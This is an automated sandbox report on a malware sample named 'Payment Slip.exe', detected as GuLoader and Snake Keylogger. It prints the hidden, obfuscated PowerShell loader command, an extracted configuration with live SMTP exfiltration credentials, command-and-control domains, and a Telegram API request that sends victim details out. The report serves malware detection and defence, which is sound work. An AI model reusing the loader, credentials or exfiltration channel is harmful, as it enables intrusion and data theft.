Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Slip.exe

Overview

General Information

Sample name:Payment Slip.exe
Analysis ID:1481491
MD5:db9b31da65d0ef913176d54ceb4cf5f4
SHA1:5878f8c4e6b82ef6c9d32c020bb9d5898e973e96
SHA256:893b893178434a4273089c619b1acaefab661c6d647d832a6375fb53e2753669
Tags:exe
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Powershell drops PE file
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Payment Slip.exe (PID: 6048 cmdline: "C:\Users\user\Desktop\Payment Slip.exe" MD5: DB9B31DA65D0EF913176D54CEB4CF5F4)
    • powershell.exe (PID: 3372 cmdline: "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Masculinity.exe (PID: 528 cmdline: "C:\Users\user\AppData\Local\Temp\Masculinity.exe" MD5: DB9B31DA65D0EF913176D54CEB4CF5F4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "amir.brizman@raicoi.com", "Password": "9Lhb3)$OQ.km", "Host": "smtp.privateemail.com", "Port": "587"}
SourceRuleDescriptionAuthorStrings
00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000002.00000002.2679871550.00000000095F2000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: Masculinity.exe PID: 528JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Masculinity.exe PID: 528JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) ", CommandLine: "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Slip.exe", ParentImage: C:\Users\user\Desktop\Payment Slip.exe, ParentProcessId: 6048, ParentProcessName: Payment Slip.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) ", ProcessId: 3372, ProcessName: powershell.exe
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 66.29.159.53, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\Masculinity.exe, Initiated: true, ProcessId: 528, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49734
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) ", CommandLine: "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Slip.exe", ParentImage: C:\Users\user\Desktop\Payment Slip.exe, ParentProcessId: 6048, ParentProcessName: Payment Slip.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) ", ProcessId: 3372, ProcessName: powershell.exe
          No Snort rule has matched
          Timestamp:2024-07-25T10:05:32.773119+0200
          SID:2803274
          Source Port:49719
          Destination Port:80
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-07-25T10:04:28.575054+0200
          SID:2022930
          Source Port:443
          Destination Port:49706
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-07-25T10:05:06.827230+0200
          SID:2022930
          Source Port:443
          Destination Port:49714
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-07-25T10:05:23.882523+0200
          SID:2803274
          Source Port:49716
          Destination Port:80
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-07-25T10:05:24.468328+0200
          SID:2803305
          Source Port:49718
          Destination Port:443
          Protocol:TCP
          Classtype:Unknown Traffic
          Timestamp:2024-07-25T10:05:21.569955+0200
          SID:2803274
          Source Port:49716
          Destination Port:80
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-07-25T10:05:10.710092+0200
          SID:2803270
          Source Port:49715
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-07-25T10:06:02.130852+0200
          SID:2803305
          Source Port:49732
          Destination Port:443
          Protocol:TCP
          Classtype:Unknown Traffic

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://smtp.privateemail.comAvira URL Cloud: Label: malware
          Source: http://anotherarmy.dns.army:8081Avira URL Cloud: Label: malware
          Source: http://aborters.duckdns.org:8081Avira URL Cloud: Label: malware
          Source: 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "amir.brizman@raicoi.com", "Password": "9Lhb3)$OQ.km", "Host": "smtp.privateemail.com", "Port": "587"}
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeReversingLabs: Detection: 31%
          Source: Payment Slip.exeReversingLabs: Detection: 31%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

          Location Tracking

          barindex
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A986DC CryptUnprotectData,7_2_04A986DC
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A98EF1 CryptUnprotectData,7_2_04A98EF1
          Source: Payment Slip.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49717 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.5:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2
          Source: Binary string: ation.pdb source: powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2678804410.00000000080E2000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
          Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
          Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_0040276E FindFirstFileW,7_2_0040276E
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_00405770
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_0040622B FindFirstFileW,FindClose,7_2_0040622B
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 0015F2EDh7_2_0015F150
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 0015F2EDh7_2_0015F33C
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 0015FAA9h7_2_0015F804
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A631E8h7_2_04A62DD0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A62C21h7_2_04A62970
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A6FD21h7_2_04A6FA78
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A60D0Dh7_2_04A60B30
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A61697h7_2_04A60B30
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A6D1B1h7_2_04A6CF08
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A6E769h7_2_04A6E4C0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A6DEB9h7_2_04A6DC10
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A6E311h7_2_04A6E068
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_04A60040
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A631E8h7_2_04A62DCB
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A6F471h7_2_04A6F1C8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A631E8h7_2_04A63116
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A6EBC1h7_2_04A6E918
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A6F019h7_2_04A6ED70
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A6F8C9h7_2_04A6F620
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A6DA61h7_2_04A6D7B8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A6D609h7_2_04A6D360
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A99280h7_2_04A98FB0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A97EB5h7_2_04A97B78
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A92151h7_2_04A91EA8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A9DF86h7_2_04A9DCB8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A96733h7_2_04A96488
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then mov esp, ebp7_2_04A9AC81
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A90741h7_2_04A90498
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A9F1C6h7_2_04A9EEF8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A90B99h7_2_04A908F0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A97571h7_2_04A972C8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A9BF96h7_2_04A9BCC8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A95179h7_2_04A94ED0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A9DAF6h7_2_04A9D828
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A948C9h7_2_04A94620
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A9BB06h7_2_04A9B838
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A962D9h7_2_04A96030
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A932B1h7_2_04A93008
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A9FAE6h7_2_04A9F818
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A96CC1h7_2_04A96A18
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A9ED36h7_2_04A9EA68
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A93709h7_2_04A93460
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A94D21h7_2_04A94A78
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A9CD46h7_2_04A9CA78
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A97119h7_2_04A96E70
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A902E9h7_2_04A90040
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A91CF9h7_2_04A91A50
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A9B676h7_2_04A9B3A8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A91449h7_2_04A911A0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A92E59h7_2_04A92BB0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A9F656h7_2_04A9F388
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A95A29h7_2_04A95780
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A9D666h7_2_04A9D398
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A9C8B6h7_2_04A9C5E8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A918A1h7_2_04A915F8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A95E81h7_2_04A95BD8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A9E8A6h7_2_04A9E5D8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A955D1h7_2_04A95328
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A979C9h7_2_04A97720
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A9D1D6h7_2_04A9CF08
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A925A9h7_2_04A92300
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A9B1E6h7_2_04A9AF18
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A9E416h7_2_04A9E148
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A90FF1h7_2_04A90D48
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A92A01h7_2_04A92758
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04A9C426h7_2_04A9C158
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB64E0h7_2_04AB61E8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB5EB7h7_2_04AB5B48
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB3076h7_2_04AB2DA8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABD7A0h7_2_04ABD4A8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABAC98h7_2_04ABA9A0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB5986h7_2_04AB56B8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB94B0h7_2_04AB91B8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB69A8h7_2_04AB66B0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB2756h7_2_04AB2488
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABC480h7_2_04ABC188
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB154Eh7_2_04AB1280
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB9978h7_2_04AB9680
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB5066h7_2_04AB4D98
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB8190h7_2_04AB7E98
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABEF88h7_2_04ABEC90
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB42B6h7_2_04AB3FE8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABFDE0h7_2_04ABFAE8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABD2D8h7_2_04ABCFE0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB22C6h7_2_04AB1FF8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABBAF0h7_2_04ABB7F8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB10BEh7_2_04AB0DF0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB8FE8h7_2_04AB8CF0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB3996h7_2_04AB36C8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABEAC0h7_2_04ABE7C8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABBFB8h7_2_04ABBCC0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABA7D0h7_2_04ABA4D8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB079Eh7_2_04AB04D0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB7CC8h7_2_04AB79D0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB54F6h7_2_04AB5228
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB8B20h7_2_04AB8828
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABF918h7_2_04ABF620
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB3506h7_2_04AB3238
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABE130h7_2_04ABDE38
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABB628h7_2_04ABB330
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB4BD6h7_2_04AB4908
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB7800h7_2_04AB7508
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABE5F8h7_2_04ABE300
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB2BE6h7_2_04AB2918
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABCE10h7_2_04ABCB18
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB19B7h7_2_04AB1710
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABA308h7_2_04ABA010
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB1E36h7_2_04AB1B68
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABB160h7_2_04ABAE68
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB0C2Eh7_2_04AB0960
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB8658h7_2_04AB8360
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB4747h7_2_04AB4478
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB6E70h7_2_04AB6B78
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABDC68h7_2_04ABD970
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB9E40h7_2_04AB9B48
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB030Eh7_2_04AB0040
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB7338h7_2_04AB7040
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04AB3E26h7_2_04AB3B58
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABF450h7_2_04ABF158
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04ABC948h7_2_04ABC650
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04E01B20h7_2_04E01828
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04E01190h7_2_04E00E98
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04E00339h7_2_04E00040
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04E00CC8h7_2_04E009D0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04E01658h7_2_04E01360
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then jmp 04E00800h7_2_04E00508
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then push 00000000h7_2_04E854CF
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_04E808DE
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_04E80960
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_04E80D26
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_04E80A10

          Networking

          barindex
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficTCP traffic: 192.168.2.5:49734 -> 66.29.159.53:587
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20and%20Time:%2027/07/2024%20/%2007:40:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20374653%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
